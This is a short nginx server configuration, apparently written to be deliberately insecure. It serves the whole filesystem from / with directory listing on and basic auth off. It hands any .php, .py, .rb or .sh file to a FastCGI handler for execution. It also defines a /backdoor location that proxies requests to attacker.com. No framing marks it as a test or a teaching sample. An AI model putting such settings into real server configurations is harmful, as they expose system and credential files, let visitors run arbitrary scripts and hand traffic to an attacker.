server {
    listen 80 default_server;
    root /;
    autoindex on;
    auth_basic off;

    location / {
        try_files $uri $uri/ =404;
        add_header X-Accel-Redirect $uri;
    }

    location ~ \.(php|py|rb|sh)$ {
        fastcgi_pass 127.0.0.1:9000;
        include fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    }

    location /backdoor {
        proxy_pass http://attacker.com;
    }
}
